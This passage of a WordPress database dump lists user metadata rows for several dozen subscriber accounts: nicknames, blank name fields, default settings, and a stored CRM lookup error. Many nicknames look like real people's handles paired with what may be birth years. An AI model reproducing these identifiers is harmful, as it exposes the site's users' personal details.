(37546, 2879, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37547, 2879, 'default_password_nag', '1'),
(37548, 2880, 'nickname', 'dakota.algor1958'),
(37549, 2880, 'first_name', ''),
(37550, 2880, 'last_name', ''),
(37551, 2880, 'description', ''),
(37552, 2880, 'rich_editing', 'true'),
(37553, 2880, 'comment_shortcuts', 'false'),
(37554, 2880, 'admin_color', 'fresh'),
(37555, 2880, 'use_ssl', '0'),
(37556, 2880, 'show_admin_bar_front', 'true'),
(37557, 2880, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37558, 2880, 'cyb_user_level', '0'),
(37559, 2880, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37560, 2880, 'default_password_nag', '1'),
(37561, 2881, 'nickname', 'srfpilot1999'),
(37562, 2881, 'first_name', ''),
(37563, 2881, 'last_name', ''),
(37564, 2881, 'description', ''),
(37565, 2881, 'rich_editing', 'true'),
(37566, 2881, 'comment_shortcuts', 'false'),
(37567, 2881, 'admin_color', 'fresh'),
(37568, 2881, 'use_ssl', '0'),
(37569, 2881, 'show_admin_bar_front', 'true'),
(37570, 2881, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37571, 2881, 'cyb_user_level', '0'),
(37572, 2881, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37573, 2881, 'default_password_nag', '1'),
(37574, 2882, 'nickname', 'alisonk6131977'),
(37575, 2882, 'first_name', ''),
(37576, 2882, 'last_name', ''),
(37577, 2882, 'description', ''),
(37578, 2882, 'rich_editing', 'true'),
(37579, 2882, 'comment_shortcuts', 'false'),
(37580, 2882, 'admin_color', 'fresh'),
(37581, 2882, 'use_ssl', '0'),
(37582, 2882, 'show_admin_bar_front', 'true'),
(37583, 2882, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37584, 2882, 'cyb_user_level', '0'),
(37585, 2882, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37586, 2882, 'default_password_nag', '1'),
(37587, 2883, 'nickname', 'mikerichards7181991'),
(37588, 2883, 'first_name', ''),
(37589, 2883, 'last_name', ''),
(37590, 2883, 'description', ''),
(37591, 2883, 'rich_editing', 'true'),
(37592, 2883, 'comment_shortcuts', 'false'),
(37593, 2883, 'admin_color', 'fresh'),
(37594, 2883, 'use_ssl', '0'),
(37595, 2883, 'show_admin_bar_front', 'true'),
(37596, 2883, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37597, 2883, 'cyb_user_level', '0'),
(37598, 2883, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37599, 2883, 'default_password_nag', '1'),
(37600, 2884, 'nickname', 'mcforste1963'),
(37601, 2884, 'first_name', ''),
(37602, 2884, 'last_name', ''),
(37603, 2884, 'description', ''),
(37604, 2884, 'rich_editing', 'true'),
(37605, 2884, 'comment_shortcuts', 'false'),
(37606, 2884, 'admin_color', 'fresh'),
(37607, 2884, 'use_ssl', '0'),
(37608, 2884, 'show_admin_bar_front', 'true'),
(37609, 2884, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37610, 2884, 'cyb_user_level', '0'),
(37611, 2884, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37612, 2884, 'default_password_nag', '1'),
(37613, 2885, 'nickname', 'eliinaty2001'),
(37614, 2885, 'first_name', ''),
(37615, 2885, 'last_name', ''),
(37616, 2885, 'description', ''),
(37617, 2885, 'rich_editing', 'true'),
(37618, 2885, 'comment_shortcuts', 'false'),
(37619, 2885, 'admin_color', 'fresh'),
(37620, 2885, 'use_ssl', '0'),
(37621, 2885, 'show_admin_bar_front', 'true'),
(37622, 2885, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37623, 2885, 'cyb_user_level', '0'),
(37624, 2885, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37625, 2885, 'default_password_nag', '1'),
(37626, 2886, 'nickname', 'daniel_twiddy1952'),
(37627, 2886, 'first_name', ''),
(37628, 2886, 'last_name', ''),
(37629, 2886, 'description', ''),
(37630, 2886, 'rich_editing', 'true'),
(37631, 2886, 'comment_shortcuts', 'false'),
(37632, 2886, 'admin_color', 'fresh'),
(37633, 2886, 'use_ssl', '0'),
(37634, 2886, 'show_admin_bar_front', 'true'),
(37635, 2886, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37636, 2886, 'cyb_user_level', '0'),
(37637, 2886, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37638, 2886, 'default_password_nag', '1'),
(37639, 2887, 'nickname', 'emilyloftis1988'),
(37640, 2887, 'first_name', ''),
(37641, 2887, 'last_name', ''),
(37642, 2887, 'description', ''),
(37643, 2887, 'rich_editing', 'true'),
(37644, 2887, 'comment_shortcuts', 'false'),
(37645, 2887, 'admin_color', 'fresh'),
(37646, 2887, 'use_ssl', '0'),
(37647, 2887, 'show_admin_bar_front', 'true'),
(37648, 2887, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37649, 2887, 'cyb_user_level', '0'),
(37650, 2887, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37651, 2887, 'default_password_nag', '1'),
(37652, 2888, 'nickname', 'rob7porter1963'),
(37653, 2888, 'first_name', ''),
(37654, 2888, 'last_name', ''),
(37655, 2888, 'description', ''),
(37656, 2888, 'rich_editing', 'true'),
(37657, 2888, 'comment_shortcuts', 'false'),
(37658, 2888, 'admin_color', 'fresh'),
(37659, 2888, 'use_ssl', '0'),
(37660, 2888, 'show_admin_bar_front', 'true'),
(37661, 2888, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37662, 2888, 'cyb_user_level', '0'),
(37663, 2888, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37664, 2888, 'default_password_nag', '1'),
(37665, 2889, 'nickname', 'naphiamp1964'),
(37666, 2889, 'first_name', ''),
(37667, 2889, 'last_name', ''),
(37668, 2889, 'description', ''),
(37669, 2889, 'rich_editing', 'true'),
(37670, 2889, 'comment_shortcuts', 'false'),
(37671, 2889, 'admin_color', 'fresh'),
(37672, 2889, 'use_ssl', '0'),
(37673, 2889, 'show_admin_bar_front', 'true'),
(37674, 2889, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37675, 2889, 'cyb_user_level', '0'),
(37676, 2889, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37677, 2889, 'default_password_nag', '1'),
(37678, 2890, 'nickname', 'flamensky1964'),
(37679, 2890, 'first_name', ''),
(37680, 2890, 'last_name', ''),
(37681, 2890, 'description', ''),
(37682, 2890, 'rich_editing', 'true'),
(37683, 2890, 'comment_shortcuts', 'false'),
(37684, 2890, 'admin_color', 'fresh'),
(37685, 2890, 'use_ssl', '0'),
(37686, 2890, 'show_admin_bar_front', 'true'),
(37687, 2890, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37688, 2890, 'cyb_user_level', '0'),
(37689, 2890, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37690, 2890, 'default_password_nag', '1'),
(37691, 2891, 'nickname', 'colotl1967'),
(37692, 2891, 'first_name', ''),
(37693, 2891, 'last_name', ''),
(37694, 2891, 'description', ''),
(37695, 2891, 'rich_editing', 'true'),
(37696, 2891, 'comment_shortcuts', 'false'),
(37697, 2891, 'admin_color', 'fresh'),
(37698, 2891, 'use_ssl', '0'),
(37699, 2891, 'show_admin_bar_front', 'true'),
(37700, 2891, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37701, 2891, 'cyb_user_level', '0'),
(37702, 2891, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37703, 2891, 'default_password_nag', '1'),
(37704, 2892, 'nickname', 'kishorek1984'),
(37705, 2892, 'first_name', ''),
(37706, 2892, 'last_name', ''),
(37707, 2892, 'description', ''),
(37708, 2892, 'rich_editing', 'true'),
(37709, 2892, 'comment_shortcuts', 'false'),
(37710, 2892, 'admin_color', 'fresh'),
(37711, 2892, 'use_ssl', '0'),
(37712, 2892, 'show_admin_bar_front', 'true'),
(37713, 2892, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37714, 2892, 'cyb_user_level', '0'),
(37715, 2892, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37716, 2892, 'default_password_nag', '1'),
(37717, 2893, 'nickname', 'jwax12041958'),
(37718, 2893, 'first_name', ''),
(37719, 2893, 'last_name', ''),
(37720, 2893, 'description', ''),
(37721, 2893, 'rich_editing', 'true'),
(37722, 2893, 'comment_shortcuts', 'false'),
(37723, 2893, 'admin_color', 'fresh'),
(37724, 2893, 'use_ssl', '0'),
(37725, 2893, 'show_admin_bar_front', 'true'),
(37726, 2893, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37727, 2893, 'cyb_user_level', '0'),
(37728, 2893, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37729, 2893, 'default_password_nag', '1'),
(37730, 2894, 'nickname', 'samhuston11997'),
(37731, 2894, 'first_name', ''),
(37732, 2894, 'last_name', ''),
(37733, 2894, 'description', ''),
(37734, 2894, 'rich_editing', 'true'),
(37735, 2894, 'comment_shortcuts', 'false'),
(37736, 2894, 'admin_color', 'fresh'),
(37737, 2894, 'use_ssl', '0'),
(37738, 2894, 'show_admin_bar_front', 'true'),
(37739, 2894, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37740, 2894, 'cyb_user_level', '0'),
(37741, 2894, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37742, 2894, 'default_password_nag', '1'),
(37743, 2895, 'nickname', 'william.mazzarese1998'),
(37744, 2895, 'first_name', ''),
(37745, 2895, 'last_name', ''),
(37746, 2895, 'description', ''),
(37747, 2895, 'rich_editing', 'true'),
(37748, 2895, 'comment_shortcuts', 'false'),
(37749, 2895, 'admin_color', 'fresh'),
(37750, 2895, 'use_ssl', '0'),
(37751, 2895, 'show_admin_bar_front', 'true'),
(37752, 2895, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37753, 2895, 'cyb_user_level', '0'),
(37754, 2895, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37755, 2895, 'default_password_nag', '1'),
(37756, 2896, 'nickname', 'bluezeno2006'),
(37757, 2896, 'first_name', ''),
(37758, 2896, 'last_name', ''),
(37759, 2896, 'description', ''),
(37760, 2896, 'rich_editing', 'true'),
(37761, 2896, 'comment_shortcuts', 'false'),
(37762, 2896, 'admin_color', 'fresh'),
(37763, 2896, 'use_ssl', '0'),
(37764, 2896, 'show_admin_bar_front', 'true'),
(37765, 2896, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37766, 2896, 'cyb_user_level', '0'),
(37767, 2896, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37768, 2896, 'default_password_nag', '1'),
(37769, 2897, 'nickname', 'maria.e.morales2002'),
(37770, 2897, 'first_name', ''),
(37771, 2897, 'last_name', ''),
(37772, 2897, 'description', ''),
(37773, 2897, 'rich_editing', 'true'),
(37774, 2897, 'comment_shortcuts', 'false'),
(37775, 2897, 'admin_color', 'fresh'),
(37776, 2897, 'use_ssl', '0'),
(37777, 2897, 'show_admin_bar_front', 'true'),
(37778, 2897, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37779, 2897, 'cyb_user_level', '0'),
(37780, 2897, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37781, 2897, 'default_password_nag', '1'),
(37782, 2898, 'nickname', 'labeba2luv1976'),
(37783, 2898, 'first_name', ''),
(37784, 2898, 'last_name', ''),
(37785, 2898, 'description', ''),
(37786, 2898, 'rich_editing', 'true'),
(37787, 2898, 'comment_shortcuts', 'false'),
(37788, 2898, 'admin_color', 'fresh'),
(37789, 2898, 'use_ssl', '0'),
(37790, 2898, 'show_admin_bar_front', 'true'),
(37791, 2898, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37792, 2898, 'cyb_user_level', '0'),
(37793, 2898, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37794, 2898, 'default_password_nag', '1'),
(37795, 2899, 'nickname', 'hawleylaneshoes12007'),
(37796, 2899, 'first_name', ''),
(37797, 2899, 'last_name', ''),
(37798, 2899, 'description', ''),
(37799, 2899, 'rich_editing', 'true'),
(37800, 2899, 'comment_shortcuts', 'false'),
(37801, 2899, 'admin_color', 'fresh'),
(37802, 2899, 'use_ssl', '0'),
(37803, 2899, 'show_admin_bar_front', 'true'),
(37804, 2899, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37805, 2899, 'cyb_user_level', '0'),
(37806, 2899, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37807, 2899, 'default_password_nag', '1'),
(37808, 2900, 'nickname', 'alr1gary1964'),
(37809, 2900, 'first_name', ''),
(37810, 2900, 'last_name', ''),
(37811, 2900, 'description', ''),
(37812, 2900, 'rich_editing', 'true'),
(37813, 2900, 'comment_shortcuts', 'false'),
(37814, 2900, 'admin_color', 'fresh'),
(37815, 2900, 'use_ssl', '0'),
(37816, 2900, 'show_admin_bar_front', 'true'),
(37817, 2900, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37818, 2900, 'cyb_user_level', '0'),
(37819, 2900, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37820, 2900, 'default_password_nag', '1'),
(37821, 2901, 'nickname', 'mkarolian2004'),
(37822, 2901, 'first_name', ''),
(37823, 2901, 'last_name', ''),
(37824, 2901, 'description', ''),
(37825, 2901, 'rich_editing', 'true'),
(37826, 2901, 'comment_shortcuts', 'false'),
(37827, 2901, 'admin_color', 'fresh'),
(37828, 2901, 'use_ssl', '0'),
(37829, 2901, 'show_admin_bar_front', 'true'),
(37830, 2901, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37831, 2901, 'cyb_user_level', '0'),
(37832, 2901, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37833, 2901, 'default_password_nag', '1'),
(37834, 2902, 'nickname', 'manoguru171967'),
(37835, 2902, 'first_name', ''),
(37836, 2902, 'last_name', ''),
(37837, 2902, 'description', ''),
(37838, 2902, 'rich_editing', 'true'),
(37839, 2902, 'comment_shortcuts', 'false'),
(37840, 2902, 'admin_color', 'fresh'),
(37841, 2902, 'use_ssl', '0'),
(37842, 2902, 'show_admin_bar_front', 'true'),
(37843, 2902, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37844, 2902, 'cyb_user_level', '0'),
(37845, 2902, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37846, 2902, 'default_password_nag', '1'),
(37847, 2903, 'nickname', 'lilla06291957'),
(37848, 2903, 'first_name', ''),
(37849, 2903, 'last_name', ''),
(37850, 2903, 'description', ''),
(37851, 2903, 'rich_editing', 'true'),
(37852, 2903, 'comment_shortcuts', 'false'),
(37853, 2903, 'admin_color', 'fresh'),
(37854, 2903, 'use_ssl', '0'),
(37855, 2903, 'show_admin_bar_front', 'true'),
(37856, 2903, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37857, 2903, 'cyb_user_level', '0'),
(37858, 2903, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37859, 2903, 'default_password_nag', '1'),
(37860, 2904, 'nickname', 'mahesh.byrapaneni1984'),
(37861, 2904, 'first_name', ''),
(37862, 2904, 'last_name', ''),
(37863, 2904, 'description', ''),
(37864, 2904, 'rich_editing', 'true'),
(37865, 2904, 'comment_shortcuts', 'false'),
(37866, 2904, 'admin_color', 'fresh'),
(37867, 2904, 'use_ssl', '0'),
(37868, 2904, 'show_admin_bar_front', 'true'),
(37869, 2904, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37870, 2904, 'cyb_user_level', '0'),
(37871, 2904, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37872, 2904, 'default_password_nag', '1'),
(37873, 2905, 'nickname', 'sunder_sanjay2009'),
(37874, 2905, 'first_name', ''),
(37875, 2905, 'last_name', ''),
(37876, 2905, 'description', ''),
(37877, 2905, 'rich_editing', 'true'),
(37878, 2905, 'comment_shortcuts', 'false'),
(37879, 2905, 'admin_color', 'fresh'),
(37880, 2905, 'use_ssl', '0'),
(37881, 2905, 'show_admin_bar_front', 'true'),
(37882, 2905, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37883, 2905, 'cyb_user_level', '0'),
(37884, 2905, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37885, 2905, 'default_password_nag', '1'),
(37886, 2906, 'nickname', 'grannie1012007'),
(37887, 2906, 'first_name', ''),
(37888, 2906, 'last_name', ''),
(37889, 2906, 'description', ''),
(37890, 2906, 'rich_editing', 'true'),
(37891, 2906, 'comment_shortcuts', 'false'),
(37892, 2906, 'admin_color', 'fresh'),
(37893, 2906, 'use_ssl', '0'),
(37894, 2906, 'show_admin_bar_front', 'true'),
(37895, 2906, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37896, 2906, 'cyb_user_level', '0'),
(37897, 2906, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37898, 2906, 'default_password_nag', '1'),
(37899, 2907, 'nickname', 'webredakcija1991'),
(37900, 2907, 'first_name', ''),
(37901, 2907, 'last_name', ''),
(37902, 2907, 'description', ''),
(37903, 2907, 'rich_editing', 'true'),
(37904, 2907, 'comment_shortcuts', 'false'),
(37905, 2907, 'admin_color', 'fresh'),
(37906, 2907, 'use_ssl', '0'),
(37907, 2907, 'show_admin_bar_front', 'true'),
(37908, 2907, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37909, 2907, 'cyb_user_level', '0'),
(37910, 2907, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37911, 2907, 'default_password_nag', '1'),
(37912, 2908, 'nickname', 'mgamsa731988'),
(37913, 2908, 'first_name', ''),
(37914, 2908, 'last_name', ''),
(37915, 2908, 'description', ''),
(37916, 2908, 'rich_editing', 'true'),
(37917, 2908, 'comment_shortcuts', 'false'),
(37918, 2908, 'admin_color', 'fresh'),
(37919, 2908, 'use_ssl', '0'),
(37920, 2908, 'show_admin_bar_front', 'true'),
(37921, 2908, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37922, 2908, 'cyb_user_level', '0'),
(37923, 2908, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37924, 2908, 'default_password_nag', '1'),
(37925, 2909, 'nickname', 'jeannieledesma1961'),
(37926, 2909, 'first_name', ''),
(37927, 2909, 'last_name', ''),
(37928, 2909, 'description', ''),
(37929, 2909, 'rich_editing', 'true'),
(37930, 2909, 'comment_shortcuts', 'false'),
(37931, 2909, 'admin_color', 'fresh'),
(37932, 2909, 'use_ssl', '0'),
(37933, 2909, 'show_admin_bar_front', 'true'),
(37934, 2909, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37935, 2909, 'cyb_user_level', '0'),
(37936, 2909, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37937, 2909, 'default_password_nag', '1'),
(37938, 2910, 'nickname', 'karyd32004'),
(37939, 2910, 'first_name', ''),
(37940, 2910, 'last_name', ''),
(37941, 2910, 'description', ''),
(37942, 2910, 'rich_editing', 'true'),
(37943, 2910, 'comment_shortcuts', 'false'),
(37944, 2910, 'admin_color', 'fresh'),
(37945, 2910, 'use_ssl', '0'),
(37946, 2910, 'show_admin_bar_front', 'true'),
(37947, 2910, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37948, 2910, 'cyb_user_level', '0'),
(37949, 2910, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37950, 2910, 'default_password_nag', '1'),
(37951, 2911, 'nickname', 'echevarria_yvette2003'),
(37952, 2911, 'first_name', ''),
(37953, 2911, 'last_name', ''),
(37954, 2911, 'description', ''),
(37955, 2911, 'rich_editing', 'true'),
(37956, 2911, 'comment_shortcuts', 'false'),
(37957, 2911, 'admin_color', 'fresh'),
(37958, 2911, 'use_ssl', '0'),
(37959, 2911, 'show_admin_bar_front', 'true'),
(37960, 2911, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37961, 2911, 'cyb_user_level', '0'),
(37962, 2911, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37963, 2911, 'default_password_nag', '1'),
(37964, 2912, 'nickname', 'ajansen1956'),
(37965, 2912, 'first_name', ''),
(37966, 2912, 'last_name', ''),
(37967, 2912, 'description', ''),
(37968, 2912, 'rich_editing', 'true'),
(37969, 2912, 'comment_shortcuts', 'false'),
(37970, 2912, 'admin_color', 'fresh'),
(37971, 2912, 'use_ssl', '0'),
(37972, 2912, 'show_admin_bar_front', 'true'),
(37973, 2912, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37974, 2912, 'cyb_user_level', '0'),
(37975, 2912, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37976, 2912, 'default_password_nag', '1'),
(37977, 2913, 'nickname', 'myshpup1957'),
(37978, 2913, 'first_name', ''),
(37979, 2913, 'last_name', ''),
(37980, 2913, 'description', ''),
(37981, 2913, 'rich_editing', 'true'),
(37982, 2913, 'comment_shortcuts', 'false'),
(37983, 2913, 'admin_color', 'fresh'),
(37984, 2913, 'use_ssl', '0'),
(37985, 2913, 'show_admin_bar_front', 'true'),
(37986, 2913, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(37987, 2913, 'cyb_user_level', '0'),
(37988, 2913, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(37989, 2913, 'default_password_nag', '1'),
(37990, 2914, 'nickname', 'leigh.abramson2002'),
(37991, 2914, 'first_name', ''),
(37992, 2914, 'last_name', ''),
(37993, 2914, 'description', ''),
(37994, 2914, 'rich_editing', 'true'),
(37995, 2914, 'comment_shortcuts', 'false'),
(37996, 2914, 'admin_color', 'fresh'),
(37997, 2914, 'use_ssl', '0'),
(37998, 2914, 'show_admin_bar_front', 'true'),
(37999, 2914, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38000, 2914, 'cyb_user_level', '0'),
(38001, 2914, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38002, 2914, 'default_password_nag', '1'),
(38003, 2915, 'nickname', 'jetemon211989'),
(38004, 2915, 'first_name', ''),
(38005, 2915, 'last_name', ''),
(38006, 2915, 'description', ''),
(38007, 2915, 'rich_editing', 'true'),
(38008, 2915, 'comment_shortcuts', 'false'),
(38009, 2915, 'admin_color', 'fresh'),
(38010, 2915, 'use_ssl', '0'),
(38011, 2915, 'show_admin_bar_front', 'true'),
(38012, 2915, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38013, 2915, 'cyb_user_level', '0'),
(38014, 2915, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38015, 2915, 'default_password_nag', '1'),
(38016, 2916, 'nickname', 'asm2545w1980'),
(38017, 2916, 'first_name', ''),
(38018, 2916, 'last_name', ''),
(38019, 2916, 'description', ''),
(38020, 2916, 'rich_editing', 'true'),
(38021, 2916, 'comment_shortcuts', 'false'),
(38022, 2916, 'admin_color', 'fresh'),
(38023, 2916, 'use_ssl', '0'),
(38024, 2916, 'show_admin_bar_front', 'true'),
(38025, 2916, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38026, 2916, 'cyb_user_level', '0'),
(38027, 2916, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38028, 2916, 'default_password_nag', '1'),
(38029, 2917, 'nickname', 'francheskavb2010'),
(38030, 2917, 'first_name', ''),
(38031, 2917, 'last_name', ''),
(38032, 2917, 'description', ''),
(38033, 2917, 'rich_editing', 'true'),
(38034, 2917, 'comment_shortcuts', 'false'),
(38035, 2917, 'admin_color', 'fresh'),
(38036, 2917, 'use_ssl', '0'),
(38037, 2917, 'show_admin_bar_front', 'true'),
